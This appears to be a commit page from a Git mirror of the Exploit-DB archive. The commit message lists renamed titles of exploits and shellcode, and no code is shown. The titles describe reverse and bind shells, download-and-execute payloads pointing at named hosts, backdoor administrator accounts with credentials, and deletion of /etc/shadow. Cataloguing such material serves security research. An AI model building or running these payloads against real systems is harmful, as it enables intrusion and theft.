bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/java/webapps/43733.rb
Offensive Security 8a2e4ff27a DB: 2018-01-19 
58 changes to exploits/shellcodes

Smiths Medical Medfusion 4000 - 'DHCP' Denial of Service

WebKit - 'WebCore::InputType::element' Use-After-Free
WebKit - 'WebCore::InputType::element' Use-After-Free (1)

WebKit - 'WebCore::InputType::element' Use-After-Free
WebKit - 'WebCore::InputType::element' Use-After-Free (2)
Linux Kernel 2.4.22 - 'do_brk()' Local Privilege Escalation
Linux Kernel 2.4.22 - 'do_brk()' Local Privilege Escalation (1)
Linux Kernel 2.4.22 - 'do_brk()' Local Privilege Escalation (2)

Rosoft Media Player 4.2.1 - Local Buffer Overflow
Rosoft Media Player 4.2.1 (Windows XP SP2/3 French) - Local Buffer Overflow

GNU Screen 4.5.0 - Local Privilege Escalation
GNU Screen 4.5.0 - Local Privilege Escalation (PoC)

glibc - 'getcwd()' Local Privilege Escalation

JAD java Decompiler 1.5.8e - Local Buffer Overflow
JAD Java Decompiler 1.5.8e - Local Buffer Overflow

JAD Java Decompiler 1.5.8e - Local Buffer Overflow
JAD Java Decompiler 1.5.8e - Local Buffer Overflow (NX Enabled)

Ability Server 2.34 - Remote APPE Buffer Overflow
Ability Server 2.34 - 'APPE' Remote Buffer Overflow

CesarFTP 0.99g - 'MKD' Remote Buffer Overflow (Metasploit)
CesarFTP 0.99g - 'MKD' Remote Buffer Overflow (Metasploit) (1)

Barracuda Spam Firewall 3.3.03.053 - Remote Code Execution
Barracuda Spam Firewall 3.3.03.053 - Remote Code Execution (1)

Barracuda Spam Firewall 3.3.03.053 - Remote Code Execution
Barracuda Spam Firewall 3.3.03.053 - Remote Code Execution (2)

Apache Tomcat < 6.0.18 - 'utf8' Directory Traversal
Apache Tomcat < 6.0.18 - 'utf8' Directory Traversal (PoC)

CesarFTP 0.99g - 'MKD' Remote Buffer Overflow (Metasploit)
CesarFTP 0.99g - 'MKD' Remote Buffer Overflow (Metasploit) (2)

Ultra Mini HTTPD 1.21 - 'POST' Remote Stack Buffer Overflow
Ultra Mini HTTPD 1.21 - 'POST' Remote Stack Buffer Overflow (1)

Ultra Mini HTTPD 1.21 - 'POST' Remote Stack Buffer Overflow
Ultra Mini HTTPD 1.21 - 'POST' Remote Stack Buffer Overflow (2)

Invision Power Board 2.0.3 - 'login.php' SQL Injection
Invision Power Board 2.0.3 - 'login.php' SQL Injection (Tutorial)

FOSS Gallery Public 1.0 - Arbitrary File Upload
FOSS Gallery Public 1.0 - Arbitrary File Upload (PoC)

Vastal I-Tech Agent Zone - SQL Injection
Vastal I-Tech Agent Zone - 'view_listing.php' SQL Injection

Netsweeper 4.0.8 - Authentication Bypass
Netsweeper 4.0.8 - Authentication Bypass (via Disabling of IP Quarantine)

Netsweeper 4.0.8 - Authentication Bypass
Netsweeper 4.0.8 - Authentication Bypass (via New Profile Creation)

Primefaces 5.x - Remote Code Execution (Metasploit)

Trend Micro InterScan Messaging Security (Virtual Appliance) - Remote Code Execution (Metasploit)
Trend Micro InterScan Messaging Security (Virtual Appliance) < 9.1.-1600 - Remote Code Execution (Metasploit)

Trend Micro InterScan Messaging Security (Virtual Appliance) - Remote Code Execution (Metasploit)
Trend Micro InterScan Messaging Security (Virtual Appliance) - 'Proxy.php' Remote Code Execution (Metasploit)

Vastal I-Tech Agent Zone - SQL Injection
Vastal I-Tech Agent Zone - 'searchCommercial.php' / 'searchResidential.php' SQL Injection

BSDi/x86 - execve(/bin/sh) ToUpper Encoded Shellcode (97 bytes)
BSDi/x86 - execve(/bin/sh) + ToUpper Encoded Shellcode (97 bytes)

FreeBSD/x86 - execve(/bin/cat /etc/master.passwd) Null-Free Shellcode (65 bytes)
FreeBSD/x86 - execve(/bin/cat /etc/master.passwd) + Null-Free Shellcode (65 bytes)

Linux/x86 - execve() Null-Free Shellcode (Generator)
Linux/x86 - execve() + Null-Free Shellcode (Generator)

Windows XP SP1 - Bind TCP Shell Shellcode (Generator)
Windows (XP SP1) - Bind TCP Shell Shellcode (Generator)

Linux/x86 - Command Generator Null-Free Shellcode (Generator)
Linux/x86 - Command Generator + Null-Free Shellcode (Generator)
(Generator) - HTTP/1.x Requests Shellcode (18+/26+ bytes)
Windows x86 - Multi-Format Encoding Tool Shellcode (Generator)
Linux/x86 - HTTP/1.x Requests Shellcode (18+/26+ bytes) (Generator)
Windows/x86 - Multi-Format Encoding Tool Shellcode (Generator)
Linux/x86 - PUSH reboot() Shellcode (30 bytes)
Linux/x86 - Shellcode Obfuscator Null-Free (Generator)
Linux/x86 - Reverse UDP tcpdump (54321/UDP) Live Packet Capture Shellcode (151 bytes)
Linux/x86 - reboot() + PUSH Shellcode (30 bytes)
Linux/x86 - Shellcode Obfuscator + Null-Free (Generator)
Linux/x86 - Reverse UDP (54321/UDP) tcpdump Live Packet Capture Shellcode (151 bytes)

Linux/x86 - setuid(0) + execve(/bin/sh_0_0) Null-Free Shellcode (28 bytes)
Linux/x86 - setuid(0) + execve(/bin/sh_0_0) + Null-Free Shellcode (28 bytes)

Linux/x86 - Reverse Connection (140.115.53.35:9999/TCP) + Download A File (cb) + Execute Shellcode (149 bytes)
Linux/x86 - Reverse TCP (140.115.53.35:9999/TCP) + Download A File (cb) + Execute Shellcode (149 bytes)

Linux/x86 - execve() Read Shellcode (92 bytes)
Linux/x86 - execve() + Read Shellcode (92 bytes)
Linux/x86 - Download File (HTTP/1.x http://0xdeadbeef/A) + execve() Null-Free Shellcode (111+ bytes)
Linux/x86 - setreuid + Executes Command Shellcode (49+ bytes)
Linux/x86 - Download File (HTTP/1.x http://0xdeadbeef/A) + execve() + Null-Free Shellcode (111+ bytes)
Linux/x86 - setreuid() + Executes Command Shellcode (49+ bytes)

Linux/x86 - execve(/bin/sh) (Re-Use Of Strings In .rodata) Shellcode (16 bytes)
Linux/x86 - execve(/bin/sh)  + Re-Use Of Strings In .rodata Shellcode (16 bytes)

Linux/x86 - execve() Diassembly Obfuscation Shellcode (32 bytes)
Linux/x86 - execve() + Diassembly + Obfuscation Shellcode (32 bytes)

Linux/x86 - TCP Proxy (192.168.1.16:1280/TCP) All Connect() Null-Free Shellcode (236 bytes)
Linux/x86 - TCP Proxy (192.168.1.16:1280/TCP) All Connect() + Null-Free Shellcode (236 bytes)
Linux/x86 (Intel x86 CPUID) - execve(/bin/sh) XORED Encoded Shellcode (41 bytes)
Linux/x86 - execve(/bin/sh) Shellcode +1 Encoded (39 bytes)
Linux/x86 (Intel x86 CPUID) - execve(/bin/sh) + XORED Encoded Shellcode (41 bytes)
Linux/x86 - execve(/bin/sh) Shellcode + 1 Encoded (39 bytes)

Linux/x86 - Anti-Debug Trick (INT 3h trap) + execve(/bin/sh) Shellcode (39 bytes)
Linux/x86 - execve(/bin/sh) + Anti-Debug Trick (INT 3h trap) Shellcode (39 bytes)

Linux/x86 - Open CD-Rom Loop 24/7 (Follows /dev/cdrom Symlink) Shellcode (39 bytes)
Linux/x86 - Eject CD-Rom Loop 24/7 (Follows /dev/cdrom Symlink) Shellcode (39 bytes)

Linux/x86 - Quick (yet conditional_ eax != 0 and edx == 0) + exit() Shellcode (4 bytes)
Linux/x86 - (eax != 0 and edx == 0) + exit() Shellcode (4 bytes)

Linux/x86 - Snoop /dev/dsp Null-Free Shellcode (172 bytes)
Linux/x86 - Snoop /dev/dsp + Null-Free Shellcode (172 bytes)
Linux/x86 - execve(/bin/sh) sysenter Opcode Array Payload Shellcode (23 bytes)
Linux/x86 - execve(/bin/sh) sysenter Opcode Array Payload Shellcode (27 bytes)
Linux/x86 - execve(/bin/sh) sysenter Opcode Array Payload Shellcode (45 bytes)
Linux/x86 - execve(/bin/sh) + sysenter Opcode Array Payload Shellcode (23 bytes)
Linux/x86 - execve(/bin/sh) + sysenter Opcode Array Payload Shellcode (27 bytes)
Linux/x86 - execve(/bin/sh) + sysenter Opcode Array Payload Shellcode (45 bytes)

Linux/x86 - Alphanumeric Encoded (IMUL Method) Shellcode (88 bytes)
Linux/x86 - Alphanumeric Encoded + IMUL Method Shellcode (88 bytes)

Linux/IA32 - execve(/bin/sh) 0xff-Free Shellcode (45 bytes)
Linux/IA32 - execve(/bin/sh) + 0xff-Free Shellcode (45 bytes)

Linux/x86 - Reverse Telnet Shell (200.182.207.235) Shellcode (134 bytes)
Linux/x86 - Reverse TCP (200.182.207.235/TCP) Telnet Shel Shellcode (134 bytes)
Linux/x86 - execve(/bin/sh) XOR Encoded Shellcode (55 bytes)
Linux/x86 - execve(/bin/sh) ToLower Encoded Shellcode (41 bytes)
Linux/x86 - execve(/bin/sh) + XOR Encoded Shellcode (55 bytes)
Linux/x86 - execve(/bin/sh) + ToLower Encoded Shellcode (41 bytes)

Linux/x86 - execve(/bin/sh) ToLower Encoded Shellcode (55 bytes)
Linux/x86 - execve(/bin/sh) + ToLower Encoded Shellcode (55 bytes)

OSX/PPC - Reboot Shellcode (28 bytes)
OSX/PPC - Reboot() Shellcode (28 bytes)
Solaris/MIPS - Download (http://10.1.1.2:80/evil-dl) + Execute (/tmp/ff) Shellcode (278 bytes)
Solaris/SPARC - setreuid + Executes Command Shellcode (92+ bytes)
Solaris/MIPS - Download File (http://10.1.1.2:80/evil-dl) + Execute (/tmp/ff) Shellcode (278 bytes)
Solaris/SPARC - setreuid() + Executes Command Shellcode (92+ bytes)

Solaris/SPARC - setreuid + execve() Shellcode (56 bytes)
Solaris/SPARC - setreuid() + execve() Shellcode (56 bytes)

Solaris/x86 - setuid(0) + execve(/bin/sh) + exit(0) Null-Free Shellcode (39 bytes)
Solaris/x86 - setuid(0) + execve(/bin/sh) + exit(0) + Null-Free Shellcode (39 bytes)
Windows 5.0 < 7.0 x86 - Bind TCP (28876/TCP) Shell + Null-Free Shellcode
Windows XP SP2 x86 (English) - cmd.exe Shellcode (23 bytes)
Windows x86 - Egg Omelet SEH Shellcode
Windows x86 - Add Administrator User (GAZZA/123456) + Start Telnet Service Shellcode (111 bytes)
Windows x86 - PEB!NtGlobalFlags Shellcode (14 bytes)
Windows XP SP2 x86 (French) - cmd.exe Shellcode (32 bytes)
Windows XP SP2 x86 - cmd.exe Shellcode (57 bytes)
Windows x86 - PEB _Kernel32.dll_ ImageBase Finder + Alphanumeric Shellcode (67 bytes)
Windows x86 - PEB _Kernel32.dll_ ImageBase Finder (ASCII Printable) Shellcode (49 bytes)
Windows x86 - Reverse Connection + Download A File + Save + Execute Shellcode
Windows x86 - Download File + Execute Shellcode (Browsers Edition) (275+ bytes) (Generator)
Windows x86 - Download File + Execute Shellcode (192 bytes)
Windows x86 - Download File (http://127.0.0.1/file.exe) + Execute Shellcode (124 bytes)
Windows NT/XP x86 - IsDebuggerPresent Shellcode (39 bytes)
Windows SP1/SP2 x86 - Beep Shellcode (35 bytes)
Windows XP SP2 x86 - MessageBox Shellcode (110 bytes)
Windows x86 - Command WinExec() Shellcode (104+ bytes)
Windows x86 - Download File (http://www.ph4nt0m.org/a.exe) + Execute (C:/a.exe) Shellcode (226+ bytes)
Windows NT/2000/XP (Russian) - Add Administartor User (slim/shady) Shellcode (318 bytes)
Windows 9x/NT/2000/XP - Reverse Generic without Loader (192.168.1.11:4919) Shellcode (249 bytes)
Windows 9x/NT/2000/XP - PEB method Shellcode (29 bytes)
Windows 9x/NT/2000/XP - PEB method Shellcode (31 bytes)
Windows 9x/NT/2000/XP - PEB method Shellcode (35 bytes)
Windows XP/2000/2003 - Reverse TCP (127.0.0.1:53/TCP) Shell Shellcode (275 bytes) (Generator)
Windows XP/2000/2003 - Download File (http://127.0.0.1/test.exe) + Execute (%systemdir%/a.exe) Shellcode (241 bytes)
Windows XP - Download File (http://www.elitehaven.net/ncat.exe) + Execute (nc.exe) Null-Free Shellcode
Windows XP SP1 - Bind TCP (58821/TCP) Shell Shellcode (116 bytes)
Windows/x86 (5.0 < 7.0) - Bind TCP (28876/TCP) Shell + Null-Free Shellcode
Windows/x86 (XP SP2) (English) - cmd.exe Shellcode (23 bytes)
Windows/x86 - Egg Omelet SEH Shellcode
Windows/x86 - Add Administrator User (GAZZA/123456) + Start Telnet Service Shellcode (111 bytes)
Windows/x86 - PEB!NtGlobalFlags Shellcode (14 bytes)
Windows/x86 (XP SP2)  (French) - cmd.exe Shellcode (32 bytes)
Windows/x86 (XP SP2) - cmd.exe Shellcode (57 bytes)
Windows/x86 - PEB _Kernel32.dll_ ImageBase Finder + Alphanumeric Shellcode (67 bytes)
Windows/x86 - PEB _Kernel32.dll_ ImageBase Finder + ASCII Printable Shellcode (49 bytes)
Windows/x86 - Reverse Connection + Download A File + Save + Execute Shellcode
Windows/x86 - Download File + Execute Shellcode (Browsers Edition) (275+ bytes) (Generator)
Windows/x86 - Download File + Execute Shellcode (192 bytes)
Windows/x86 - Download File (http://127.0.0.1/file.exe) + Execute Shellcode (124 bytes)
Windows/x86 (NT/XP) - IsDebuggerPresent Shellcode (39 bytes)
Windows/x86 (SP1/SP2) - Beep Shellcode (35 bytes)
Windows/x86 (XP SP2) - MessageBox Shellcode (110 bytes)
Windows/x86 - Command WinExec() Shellcode (104+ bytes)
Windows/x86 - Download File (http://www.ph4nt0m.org/a.exe) + Execute (C:/a.exe) Shellcode (226+ bytes)
Windows (NT/2000/XP) (Russian) - Add Administartor User (slim/shady) Shellcode (318 bytes)
Windows (9x/NT/2000/XP) - Reverse Generic Without Loader (192.168.1.11:4919) Shellcode (249 bytes)
Windows  (9x/NT/2000/XP) - PEB method Shellcode (29 bytes)
Windows  (9x/NT/2000/XP) - PEB Method Shellcode (31 bytes)
Windows (9x/NT/2000/XP) - PEB method Shellcode (35 bytes)
Windows (XP/2000/2003) - Reverse TCP (127.0.0.1:53/TCP) Shell Shellcode (275 bytes) (Generator)
Windows (XP/2000/2003) - Download File (http://127.0.0.1/test.exe) + Execute (%systemdir%/a.exe) Shellcode (241 bytes)
Windows (XP) - Download File (http://www.elitehaven.net/ncat.exe) + Execute (nc.exe) + Null-Free Shellcode
Windows (XP SP1) - Bind TCP (58821/TCP) Shell Shellcode (116 bytes)

Windows x64 - (URLDownloadToFileA) Download File (http://localhost/trojan.exe) + Execute Shellcode (218+ bytes)
Windows/x86-64 - (URLDownloadToFileA) Download File (http://localhost/trojan.exe) + Execute Shellcode (218+ bytes)

Linux/x86 - setuid(0) + execve(_/sbin/poweroff -f_) Shellcode (47 bytes)
Linux/x86 - setuid(0) + execve(/sbin/poweroff -f) Shellcode (47 bytes)

Windows XP SP2 - PEB ISbeingdebugged Beep Shellcode (56 bytes)
Windows (XP SP2) - PEB ISbeingdebugged Beep Shellcode (56 bytes)
Windows XP SP3 x86 - ShellExecuteA Shellcode
Linux/x86 - setreuid (0_0) + execve(/bin/rm /etc/shadow) Shellcode
Windows XP SP3 x86 - Add Firewall Rule (Allow 445/TCP) Traffic Shellcode
Windows/x86 (XP SP3) - ShellExecuteA Shellcode
Linux/x86 - setreuid(0_0) + execve(/bin/rm /etc/shadow) Shellcode
Windows/x86 (XP SP3) - Add Firewall Rule (Allow 445/TCP) Shellcode

Windows XP SP2 x86 - calc.exe Shellcode (45 bytes)
Windows/x86 (XP SP2) - calc.exe Shellcode (45 bytes)

Windows XP SP2 x86 (English / Arabic) - cmd.exe Shellcode (23 bytes)
Windows/x86 (XP SP2)  (English / Arabic) - cmd.exe Shellcode (23 bytes)
Windows XP Professional SP2 (English) - MessageBox Null-Free Shellcode (16 bytes)
Windows XP Professional SP2 (English) - Wordpad Null-Free Shellcode (12 bytes)
Windows  (XP Professional SP2) (English) - MessageBox + Null-Free Shellcode (16 bytes)
Windows  (XP Professional SP2) (English) - Wordpad + Null-Free Shellcode (12 bytes)

Windows XP SP2 x86 (French) - calc Shellcode (19 bytes)
Windows/x86 (XP SP2)  (French) - calc Shellcode (19 bytes)
Windows XP SP3 x86 (English) - cmd.exe Shellcode (26 bytes)
Windows XP SP2 x86 (Turkish) - cmd.exe Shellcode (26 bytes)
Windows/x86 (XP SP3)  (English) - cmd.exe Shellcode (26 bytes)
Windows/x86 (XP SP2) (Turkish) - cmd.exe Shellcode (26 bytes)
Windows XP Home SP2 (English) - calc.exe Shellcode (37 bytes)
Windows XP Home SP3 (English) - calc.exe Shellcode (37 bytes)
Windows (XP Home SP2) (English) - calc.exe Shellcode (37 bytes)
Windows (XP Home SP3) (English) - calc.exe Shellcode (37 bytes)
Windows x86 - JITed Stage-0 Shellcode
Windows x86 - JITed exec notepad Shellcode
Windows XP Professional SP2 (Italian) - calc.exe Shellcode (36 bytes)
Windows XP SP2 x86 - write.exe + ExitProcess WinExec Shellcode (16 bytes)
Windows - Egghunter JITed Stage-0 Shellcode
Windows XP SP3 x86 (Russia) - cmd + ExitProcess WinExec Shellcode (12 bytes)
Windows x86 - MessageBox Shellcode (Metasploit)
Windows XP/Vista/7 - Egghunter JITed Stage-0 Adjusted Universal Shellcode
Windows/x86 - JITed Stage-0 Shellcode
Windows/x86 - JITed exec notepad Shellcode
Windows (XP Professional SP2) (Italian) - calc.exe Shellcode (36 bytes)
Windows/x86 (XP SP2) - write.exe + ExitProcess WinExec Shellcode (16 bytes)
Windows - Egghunter (0x07333531) JITed Stage-0 Shellcode
Windows/x86 (XP SP3)  (Russia) - cmd + ExitProcess WinExec Shellcode (12 bytes)
Windows/x86 - MessageBox Shellcode (Metasploit)
Windows (XP/Vista/7) - Egghunter (0x07333531) JITed Stage-0 Adjusted Universal Shellcode

Linux/x86 - execve(/bin/sh) Shellcode (25 bytes) (2)
Linux/x86 - execve(/bin/sh) Shellcode (25 bytes)

Linux/x86 - execve(_a->/bin/sh_) Local-only Shellcode (14 bytes)
Linux/x86 - execve(a->/bin/sh) + Local-only Shellcode (14 bytes)

Linux/x86 - setreud(getuid()_ getuid()) + execve(_/bin/sh_) Shellcode (34 bytes)
Linux/x86 - setreud(getuid()_ getuid()) + execve(/bin/sh) Shellcode (34 bytes)

Windows XP SP2 (French) - Download File (http://www.site.com/nc.exe_) + Execute (c:\backdor.exe) Shellcode
Windows (XP SP2) (French) - Download File (http://www.site.com/nc.exe) + Execute (c:\backdor.exe) Shellcode

Linux/x86 - sys_execve(_/bin/sh__ _0__ _0_) with umask 16 (sys_umask(14)) Shellcode (45 bytes)
Linux/x86 - execve(_/bin/sh__ _0__ _0_) with umask 16 (sys_umask(14)) Shellcode (45 bytes)

Windows 7 Professional SP1 x64 (FR) - Beep Shellcode (39 bytes)
Windows/x86-64 (7 Professional SP1) (French) - Beep Shellcode (39 bytes)

Linux/x86 - (sys_chmod syscall) chmod 0777 /etc/shadow Shellcode (39 bytes)
Linux/x86 - chmod 0777 /etc/shadow +  sys_chmod syscall Shellcode (39 bytes)
Linux/x86 - (sys_chmod syscall) chmod 0777 /etc/passwd Shellcode (39 bytes)
Linux/x86 - sys_execve(_/bin/sh__ _-c__ _reboot_) Shellcode (45 bytes)
Linux/x86 - sys_setuid(0) + sys_setgid(0) + execve(_/bin/sh_) Shellcode (39 bytes)
Windows 7 x64 - cmd Shellcode (61 bytes)
Linux/x86 - unlink /etc/shadow Shellcode (33 bytes)
Linux/x86 - chmod 0777 /etc/passwd + sys_chmod syscall Shellcode (39 bytes)
Linux/x86 - execve(_/bin/sh__ _-c__ _reboot_) Shellcode (45 bytes)
Linux/x86 - setuid(0) + setgid(0) + execve(/bin/sh) Shellcode (39 bytes)
Windows/x86-64 (7) - cmd Shellcode (61 bytes)
Linux/x86 - unlink(/etc/shadow) Shellcode (33 bytes)
Linux/x86-64 - Add Root User (shell-storm/leet) To /etc/{shadow_passwd} Shellcode (390 bytes)
Windows XP SP3 (Spanish) - URLDownloadToFileA + CreateProcessA + ExitProcess Shellcode (176+ bytes)
Linux/x86-64 - Add Root User (shell-storm/leet) To /etc/{passwd_shadow} Shellcode (390 bytes)
Windows (XP SP3) (Spanish) - URLDownloadToFileA + CreateProcessA + ExitProcess Shellcode (176+ bytes) (Generator)
Linux - setreuid(0_0) + execve(_/bin/sh__NULL_NULL) XOR Encoded Shellcode (62 bytes)
Safari 4.0.5 < 5.0.0 (Windows XP/7) - JavaScript JITed exec calc (ASLR/DEP Bypass) Null-Free Shellcode
Linux - setreuid(0_0) + execve(_/bin/sh__NULL_NULL) + XOR Encoded Shellcode (62 bytes)
Safari 4.0.5 < 5.0.0 (Windows XP/7) - JavaScript JITed exec calc (ASLR/DEP Bypass) + Null-Free Shellcode

Windows x86 - Write-to-file ('pwned' ./f.txt) Null-Free Shellcode (278 bytes)
Windows/x86 - Write-to-file ('pwned' ./f.txt) + Null-Free Shellcode (278 bytes)
Linux/x86 - execve(/bin/sh) + Polymorphic Null-Free Shellcode (46 bytes)
Windows XP SP3 (English) - MessageBoxA Shellcode (87 bytes)
Linux/x86 - execve(/bin/sh) + Polymorphic + Null-Free Shellcode (46 bytes)
Windows (XP SP3) (English) - MessageBoxA Shellcode (87 bytes)

Windows x86 - Egghunter Checksum Routine Shellcode (18 bytes)
Windows/x86 - Egghunter Checksum Routine Shellcode (18 bytes)
Windows XP SP3 x86 (Turkish) - Add Administrator User (zrl/123456) Shellcode (127 bytes)
Windows Mobile 6.5 TR (WinCE 5.2)/ARM - MessageBox Shellcode
Windows Mobile 6.5 TR - Phone Call Shellcode
Windows XP Professional SP3 x86 (English) - Add Local Administrator User (secuid0/m0nk) Shellcode (113 bytes)
Windows x86 - Add Local Administrator User (secuid0/m0nk) Shellcode (326 bytes)
Windows/x86 (XP SP3) (Turkish) - Add Administrator User (zrl/123456) Shellcode (127 bytes)
Windows/ARM  (Mobile 6.5 TR WinCE 5.2) - MessageBox Shellcode
Windows/ARM (Mobile 6.5 TR) - Phone Call Shellcode
Windows/x86 (XP Professional SP3) (English) - Add Local Administrator User (secuid0/m0nk) Shellcode (113 bytes)
Windows/x86 - Add Local Administrator User (secuid0/m0nk) Shellcode (326 bytes)

Linux/ARM - Bind TCP Listener (0x1337/TCP) + Receive Shellcode + Payload Loader Shellcode
Linux/ARM - Bind TCP (0x1337/TCP) Listener + Receive Shellcode + Payload Loader Shellcode

Windows 5.0 < 7.0 x86 - Speaking 'You got pwned!' Null-Free Shellcode
Windows/x86 (5.0 < 7.0) - Speaking 'You got pwned!' + Null-Free Shellcode

Windows x86 - Eggsearch Shellcode (33 bytes)
Windows/x86 - Eggsearch Shellcode (33 bytes)

Windows - Download File + Execute via DNS (IPv6) Shellcode (Generator) (Metasploit)
Windows - Download File + Execute via DNS + IPv6 Shellcode (Generator) (Metasploit)
Windows PerfectXp-pc1/SP3 x86 (Turkish) - Add Administrator User (kpss/12345) Shellcode (112 bytes)
Linux/x86 - Egghunter Null-Free Shellcode (29 bytes)
Windows/x86 (PerfectXp-pc1/SP3 ) (Turkish) - Add Administrator User (kpss/12345) Shellcode (112 bytes)
Linux/x86 - Egghunter + Null-Free Shellcode (29 bytes)

Linux/x86 - setuid(0) + setgid(0) + Add Root User (iph) To /etc/passwd + No Password Polymorphic Shellcode
Linux/x86 - setuid(0) + setgid(0) + Add Root User (iph) To /etc/passwd + No Password + Polymorphic Shellcode
Windows x86 - Bind TCP Shell + Password (damn_it!$$##@;*#) Shellcode (637 bytes)
Windows XP Professional SP3 - calc.exe (C:/WINDOWS/system32/calc.exe) ROP Shellcode (428 bytes)
Windows x64 - Bind TCP (4444/TCP) Shell Shellcode (508 bytes)
Windows/x86 - Bind TCP Shell + Password (damn_it!$$##@;*#) Shellcode (637 bytes)
Windows (XP Professional SP3) - calc.exe (C:/WINDOWS/system32/calc.exe) ROP Shellcode (428 bytes)
Windows/x86-64 - Bind TCP (4444/TCP) Shell Shellcode (508 bytes)

Windows (2000/XP/7 x64/x86) - URLDownloadToFile (http://bflow.security-portal.cz/down/xy.txt) + WinExec + ExitProcess Shellcode
Windows/x86-64 / x86 (2000/XP/7) - URLDownloadToFile (http://bflow.security-portal.cz/down/xy.txt) + WinExec + ExitProcess Shellcode

Cisco ASA - Authentication Bypass _EXTRABACON_ (Improved Shellcode) (69 bytes)
Cisco ASA - 'EXTRABACON' Authentication Bypass (Improved Shellcode) (69 bytes)
Windows RT ARM - Bind TCP (4444/TCP) Shell Shellcode
Linux/x86 - Egghunter Shellcode (31 bytes)
Windows/ARM (RT) - Bind TCP (4444/TCP) Shell Shellcode
Linux/x86 - Egghunter (0x56767606) Using fstenv + Obfuscation Shellcode (31 bytes)
Windows x86 - Reverse TCP (192.168.232.129:4444/TCP) Shell + Persistent Access Shellcode (494 bytes)
Windows - MessageBox Null-Free Shellcode (113 bytes)
Windows/x86 - Reverse TCP (192.168.232.129:4444/TCP) Shell + Persistent Access Shellcode (494 bytes)
Windows - MessageBox + Null-Free Shellcode (113 bytes)
Windows 7 x86 - Bind TCP (4444/TCP) Shell Shellcode (357 bytes)
Windows - Add Administrator User (BroK3n/BroK3n) Null-Free Shellcode (194 bytes)
Windows/x86 (7) - Bind TCP (4444/TCP) Shell Shellcode (357 bytes)
Windows - Add Administrator User (BroK3n/BroK3n) + Null-Free Shellcode (194 bytes)

Linux/x86 - rmdir Shellcode (37 bytes)
Linux/x86 - rmdir() Shellcode (37 bytes)
Windows x86 - Add Administrator User (ALI/ALI) + Add To RDP Group + Enable RDP From Registry + STOP Firewall + Auto Start Terminal Service Obfuscated Shellcode (1218 bytes)
Windows x64 - Add Administrator User (ALI/ALI) + Add To RDP Group + Enable RDP From Registry + STOP Firewall + Auto Start Terminal Service Obfuscated Shellcode (1218 bytes)
Windows/x86 - Add Administrator User (ALI/ALI) + Add To RDP Group + Enable RDP From Registry + STOP Firewall + Auto Start Terminal Service + Obfuscated Shellcode (1218 bytes)
Windows/x86-64 - Add Administrator User (ALI/ALI) + Add To RDP Group + Enable RDP From Registry + STOP Firewall + Auto Start Terminal Service + Obfuscated Shellcode (1218 bytes)

Windows XP x86-64 - Download File + Execute Shellcode (Generator)
Windows/x86-64 (XP) - Download File + Execute Shellcode Using Powershell (Generator)

Linux/x86 - chmod 0777 /etc/shadow Obfuscated Shellcode (84 bytes)
Linux/x86 - chmod 0777 /etc/shadow + Obfuscated Shellcode (84 bytes)

Linux/x86 - execve(/bin/sh) Obfuscated Shellcode (40 bytes)
Linux/x86 - execve(/bin/sh) + Obfuscated Shellcode (40 bytes)

Linux/x86 - Egghunter Shellcode (20 bytes)
Linux/x86 - Egghunter (0x5159) Shellcode (20 bytes)
Linux/x86 - Create _my.txt_ In Working Directory Shellcode (37 bytes)
Linux/x86 - setreuid(0_ 0) + execve(_/sbin/halt_) + exit(0) Shellcode (49 bytes)
Linux/x86 - Create 'my.txt' In Working Directory Shellcode (37 bytes)
Linux/x86 - setreuid(0_ 0) + execve(/sbin/halt) + exit(0) Shellcode (49 bytes)
Windows XP SP3 x86 - Create (_file.txt_) Shellcode (83 bytes)
Windows XP SP3 x86 - Restart Shellcode (57 bytes)
Windows/x86 (XP SP3) - Create (file.txt) Shellcode (83 bytes)
Windows/x86 (XP SP3) - Restart Shellcode (57 bytes)

Linux/x86 - execve(/bin/sh) (Push Method) Shellcode (21 bytes)
Linux/x86 - execve(/bin/sh) + Push Method Shellcode (21 bytes)

Linux/x86-64 - execve(/bin/sh) Null-Free Shellcode (30 bytes)
Linux/x86-64 - execve(/bin/sh) + Null-Free Shellcode (30 bytes)

Linux/x86 - Reboot Shellcode (28 bytes)
Linux/x86 - Reboot() Shellcode (28 bytes)
Linux/x86 - execve(/bin/sh) ROT7 Encoded Shellcode
Windows XP SP3 x86 (Turkish) - MessageBox Shellcode (24 bytes)
Linux/x86 - Egghunter Shellcode (19 bytes)
Windows x86 - user32!MessageBox _Hello World!_ Null-Free Shellcode (199 bytes)
Linux/x86 - execve(/bin/sh) ROL/ROR Encoded Shellcode
Windows 2003 x64 - Token Stealing Shellcode (59 bytes)
OSX/x86-64 - execve(/bin/sh) Null-Free Shellcode (34 bytes)
Linux/x86 - execve(/bin/sh) + ROT7 Encoded Shellcode
Windows/x86 (XP SP3) (Turkish) - MessageBox Shellcode (24 bytes)
Linux/x86 - Egghunter (0x50905090) Without Hardcoded Signature Shellcode (19 bytes)
Windows/x86 - user32!MessageBox _Hello World!_ + Null-Free Shellcode (199 bytes)
Linux/x86 - execve(/bin/sh) + ROL/ROR Encoded Shellcode
Windows/x86-64 (2003) - Token Stealing Shellcode (59 bytes)
OSX/x86-64 - execve(/bin/sh) + Null-Free Shellcode (34 bytes)

Linux/x86-64 - Egghunter Shellcode (24 bytes)
Linux/x86-64 - Egghunter (0x6b634068) Shellcode (24 bytes)

Windows XP < 10 - Command Generator WinExec Null-Free Shellcode (Generator)
Windows (XP < 10) - Command Generator WinExec + Null-Free Shellcode (Generator)
Linux/x86-64 - Egghunter Shellcode (18 bytes)
Linux/x86 - Egghunter Shellcode (13 bytes)
Linux/x86-64 - execve() XOR/NOT/DIV Encoded Shellcode (54 bytes)
Linux/x86-64 - Egghunter (0x50905090) Shellcode (18 bytes)
Linux/x86 - Egghunter (0x4f904790) Shellcode (13 bytes)
Linux/x86-64 - execve() + XOR/NOT/DIV Encoded Shellcode (54 bytes)

Windows x86 - Download File + Run via WebDAV (//192.168.1.19/c) Null-Free Shellcode (96 bytes)
Windows/x86 - Download File + Run via WebDAV (//192.168.1.19/c) Null-Free Shellcode (96 bytes)

Windows x86 - URLDownloadToFileA() (http://192.168.86.130/sample.exe) + SetFileAttributesA() (pyld.exe) + WinExec() + ExitProcess() Shellcode (394 bytes)
Windows/x86 - URLDownloadToFileA() (http://192.168.86.130/sample.exe) + SetFileAttributesA() (pyld.exe) + WinExec() + ExitProcess() Shellcode (394 bytes)
Windows - Keylogger to File (./log.bin) Null-Free Shellcode (431 bytes)
Windows .Net Framework x86 - Execute Native x86 Shellcode
